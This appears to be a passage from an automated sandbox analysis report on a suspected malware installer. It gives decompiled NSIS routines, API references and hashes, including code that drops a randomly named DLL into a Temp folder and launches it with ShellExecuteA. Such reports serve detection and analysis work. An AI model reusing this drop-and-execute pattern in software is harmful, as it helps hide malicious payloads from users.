                                                                            • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
                                                                          • API String ID: 3508600917-2721706570
                                                                          • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                          • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
                                                                          • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                          • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 94%
                                                                          			E00404D62(CHAR* _a4, CHAR* _a8) {
                                                                          				struct HWND__* _v8;
                                                                          				signed int _v12;
                                                                          				CHAR* _v32;
                                                                          				long _v44;
                                                                          				int _v48;
                                                                          				void* _v52;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				CHAR* _t26;
                                                                          				signed int _t27;
                                                                          				CHAR* _t28;
                                                                          				long _t29;
                                                                          				signed int _t39;
                                                                          
                                                                          				_t26 =  *0x7a2764;
                                                                          				_v8 = _t26;
                                                                          				if(_t26 != 0) {
                                                                          					_t27 =  *0x4092a0; // 0x6
                                                                          					_v12 = _t27;
                                                                          					_t39 = _t27 & 0x00000001;
                                                                          					if(_t39 == 0) {
                                                                          						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
                                                                          					}
                                                                          					_t26 = lstrlenA(0x79ed60);
                                                                          					_a4 = _t26;
                                                                          					if(_a8 == 0) {
                                                                          						L6:
                                                                          						if((_v12 & 0x00000004) != 0) {
                                                                          							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
                                                                          						}
                                                                          						if((_v12 & 0x00000002) != 0) {
                                                                          							_v32 = 0x79ed60;
                                                                          							_v52 = 1;
                                                                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                          							_v44 = 0;
                                                                          							_v48 = _t29 - _t39;
                                                                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                          						}
                                                                          						if(_t39 != 0) {
                                                                          							_t28 = _a4;
                                                                          							 *((char*)(_t28 + 0x79ed60)) = 0;
                                                                          							return _t28;
                                                                          						}
                                                                          					} else {
                                                                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                          						if(_t26 < 0x800) {
                                                                          							_t26 = lstrcatA(0x79ed60, _a8);
                                                                          							goto L6;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t26;
			}
                                                                          0x00404d68
                                                                          0x00404d74
                                                                          0x00404d77
                                                                          0x00404d7d
                                                                          0x00404d89
                                                                          0x00404d8c
                                                                          0x00404d8f
                                                                          0x00404d95
                                                                          0x00404d95
                                                                          0x00404d9b
                                                                          0x00404da3
                                                                          0x00404da6
                                                                          0x00404dc3
                                                                          0x00404dc7
                                                                          0x00404dd0
                                                                          0x00404dd0
                                                                          0x00404dda
                                                                          0x00404de3
                                                                          0x00404def
                                                                          0x00404df6
                                                                          0x00404dfa
                                                                          0x00404dfd
                                                                          0x00404e10
                                                                          0x00404e1e
                                                                          0x00404e1e
                                                                          0x00404e22
                                                                          0x00404e24
                                                                          0x00404e27
                                                                          0x00000000
                                                                          0x00404e27
                                                                          0x00404da8
                                                                          0x00404db0
                                                                          0x00404db8
                                                                          0x00404dbe
                                                                          0x00000000
                                                                          0x00404dbe
                                                                          0x00404db8
                                                                          0x00404da6
                                                                          0x00404e31

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                          • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                          • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                          • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                          • String ID: `y
                                                                          • API String ID: 2531174081-1740403070
                                                                          • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                          • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
                                                                          • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                          • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405BFB(CHAR* _a4) {
                                                                          				char _t5;
                                                                          				char _t7;
                                                                          				char* _t15;
                                                                          				char* _t16;
                                                                          				CHAR* _t17;
                                                                          
                                                                          				_t17 = _a4;
                                                                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                          					_t17 =  &(_t17[4]);
                                                                          				}
                                                                          				if( *_t17 != 0 && E00405538(_t17) != 0) {
                                                                          					_t17 =  &(_t17[2]);
                                                                          				}
                                                                          				_t5 =  *_t17;
                                                                          				_t15 = _t17;
                                                                          				_t16 = _t17;
                                                                          				if(_t5 != 0) {
                                                                          					do {
                                                                          						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
                                                                          							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
                                                                          							_t16 = CharNextA(_t16);
                                                                          						}
                                                                          						_t17 = CharNextA(_t17);
                                                                          						_t5 =  *_t17;
                                                                          					} while (_t5 != 0);
                                                                          				}
                                                                          				 *_t16 =  *_t16 & 0x00000000;
                                                                          				while(1) {
                                                                          					_t16 = CharPrevA(_t15, _t16);
                                                                          					_t7 =  *_t16;
                                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                          						break;
                                                                          					}
                                                                          					 *_t16 =  *_t16 & 0x00000000;
                                                                          					if(_t15 < _t16) {
                                                                          						continue;
                                                                          					}
                                                                          					break;
                                                                          				}
                                                                          				return _t7;
                                                                          			}

                                                                          APIs
                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                          • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                          • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                          • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
                                                                          • *?|<>/":, xrefs: 00405C43
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                          • API String ID: 589700163-489697304
                                                                          • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                          • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
                                                                          • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                          • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                          				struct tagLOGBRUSH _v16;
                                                                          				long _t35;
                                                                          				long _t37;
                                                                          				void* _t40;
                                                                          				long* _t49;
                                                                          
                                                                          				if(_a4 + 0xfffffecd > 5) {
                                                                          					L15:
                                                                          					return 0;
                                                                          				}
                                                                          				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                          				if(_t49 == 0) {
                                                                          					goto L15;
                                                                          				}
                                                                          				_t35 =  *_t49;
                                                                          				if((_t49[5] & 0x00000002) != 0) {
                                                                          					_t35 = GetSysColor(_t35);
                                                                          				}
                                                                          				if((_t49[5] & 0x00000001) != 0) {
                                                                          					SetTextColor(_a8, _t35);
                                                                          				}
                                                                          				SetBkMode(_a8, _t49[4]);
                                                                          				_t37 = _t49[1];
                                                                          				_v16.lbColor = _t37;
                                                                          				if((_t49[5] & 0x00000008) != 0) {
                                                                          					_t37 = GetSysColor(_t37);
                                                                          					_v16.lbColor = _t37;
                                                                          				}
                                                                          				if((_t49[5] & 0x00000004) != 0) {
                                                                          					SetBkColor(_a8, _t37);
                                                                          				}
                                                                          				if((_t49[5] & 0x00000010) != 0) {
                                                                          					_v16.lbStyle = _t49[2];
                                                                          					_t40 = _t49[3];
                                                                          					if(_t40 != 0) {
                                                                          						DeleteObject(_t40);
                                                                          					}
                                                                          					_t49[3] = CreateBrushIndirect( &_v16);
                                                                          				}
                                                                          				return _t49[3];
                                                                          			}

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                          • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
                                                                          • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                          • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 78%
                                                                          			E0040166B() {
                                                                          				int _t18;
                                                                          				void* _t28;
                                                                          				void* _t35;
                                                                          
                                                                          				 *(_t35 + 8) = E00402A9A(0xffffffd0);
                                                                          				 *(_t35 - 8) = E00402A9A(0xffffffdf);
                                                                          				E004059BF(0x40a018,  *(_t35 + 8));
                                                                          				_t18 = lstrlenA( *(_t35 - 8));
                                                                          				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
                                                                          					lstrcatA(0x40a018, 0x40901c);
                                                                          					lstrcatA(0x40a018,  *(_t35 - 8));
                                                                          				}
                                                                          				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
                                                                          					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
                                                                          						 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                          					} else {
                                                                          						E00405707( *(_t35 + 8),  *(_t35 - 8));
                                                                          						_push(0xffffffe4);
                                                                          						goto L7;
                                                                          					}
                                                                          				} else {
                                                                          					_push(0xffffffe3);
                                                                          					L7:
                                                                          					E00401428();
                                                                          				}
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
                                                                          				return 0;
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,?,000000DF,000000D0), ref: 00401690
                                                                          • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,?,000000DF,000000D0), ref: 0040169A
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,?,000000DF,000000D0), ref: 004016AF
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,?,000000DF,000000D0), ref: 004016B8
                                                                            • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ), ref: 00405CA2
                                                                            • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                            • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                            • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                            • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                            • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405765
                                                                            • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405782
                                                                            • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
                                                                            • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                            • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                            • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                            • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                            • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                            • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                          • MoveFileA.KERNEL32 ref: 004016C3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
                                                                          • API String ID: 2621199633-2857477325
                                                                          • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                          • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
                                                                          • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                          • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404627(struct HWND__* _a4, intOrPtr _a8) {
                                                                          				long _v8;
                                                                          				signed char _v12;
                                                                          				unsigned int _v16;
                                                                          				void* _v20;
                                                                          				intOrPtr _v24;
                                                                          				long _v56;
                                                                          				void* _v60;
                                                                          				long _t15;
                                                                          				unsigned int _t19;
                                                                          				signed int _t25;
                                                                          				struct HWND__* _t28;
                                                                          
                                                                          				_t28 = _a4;
                                                                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                          				if(_a8 == 0) {
                                                                          					L4:
                                                                          					_v56 = _t15;
                                                                          					_v60 = 4;
                                                                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                          					return _v24;
                                                                          				}
                                                                          				_t19 = GetMessagePos();
                                                                          				_v16 = _t19 >> 0x10;
                                                                          				_v20 = _t19;
                                                                          				ScreenToClient(_t28,  &_v20);
                                                                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                          				if((_v12 & 0x00000066) != 0) {
                                                                          					_t15 = _v8;
                                                                          					goto L4;
                                                                          				}
                                                                          				return _t25 | 0xffffffff;
                                                                          			}

                                                                          APIs
                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
                                                                          • GetMessagePos.USER32 ref: 0040464A
                                                                          • ScreenToClient.USER32 ref: 00404664
                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                          • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
                                                                          • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                          • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
                                                                          				int _t7;
                                                                          				int _t15;
                                                                          				struct HWND__* _t16;
                                                                          
                                                                          				_t16 = _a4;
                                                                          				if(_a8 == 0x110) {
                                                                          					SetTimer(_t16, 1, 0xfa, 0);
                                                                          					_a8 = 0x113;
                                                                          					 *0x40b020 = _a16;
                                                                          				}
                                                                          				if(_a8 == 0x113) {
                                                                          					_t15 =  *0x789930; // 0x328ac
                                                                          					_t7 =  *0x79d938; // 0x328b0
                                                                          					if(_t15 >= _t7) {
                                                                          						_t15 = _t7;
                                                                          					}
                                                                          					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
                                                                          					SetWindowTextA(_t16, 0x7898f0);
                                                                          					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
                                                                          					ShowWindow(_t16, 5);
                                                                          				}
                                                                          				return 0;
                                                                          			}

                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                                                          • MulDiv.KERNEL32(000328AC,00000064,000328B0), ref: 00402BF6
                                                                          • wsprintfA.USER32 ref: 00402C09
                                                                          • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
                                                                          • SetDlgItemTextA.USER32 ref: 00402C21
                                                                          • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: TextWindow$ItemShowTimerwsprintf
                                                                          • String ID:
                                                                          • API String ID: 559026099-0
                                                                          • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                          • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
                                                                          • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                          • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 64%
                                                                          			E00401E34() {
                                                                          				signed int _t7;
                                                                          				void* _t19;
                                                                          				char* _t20;
                                                                          				signed int _t24;
                                                                          				void* _t26;
                                                                          
                                                                          				_t24 = E00402A9A(_t19);
                                                                          				_t20 = E00402A9A(0x31);
                                                                          				_t7 = E00402A9A(0x22);
                                                                          				_push(_t20);
                                                                          				_push(_t24);
                                                                          				_t22 = _t7;
                                                                          				wsprintfA("C:\Users\hardz\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll", "%s %s");
                                                                          				E00401428(0xffffffec);
                                                                          				asm("sbb eax, eax");
                                                                          				asm("sbb eax, eax");
                                                                          				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
                                                                          					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                          				}
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
                                                                          				return 0;
                                                                          			}

                                                                          APIs
                                                                          • wsprintfA.USER32 ref: 00401E5A
                                                                          • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                                                          • C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll, xrefs: 00401E53
                                                                          • %s %s, xrefs: 00401E4E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: ExecuteShellwsprintf
                                                                          • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
                                                                          • API String ID: 2956387742-943549456
                                                                          • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                          • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
                                                                          • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                          • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
                                                                          				void* _v8;
                                                                          				char _v272;
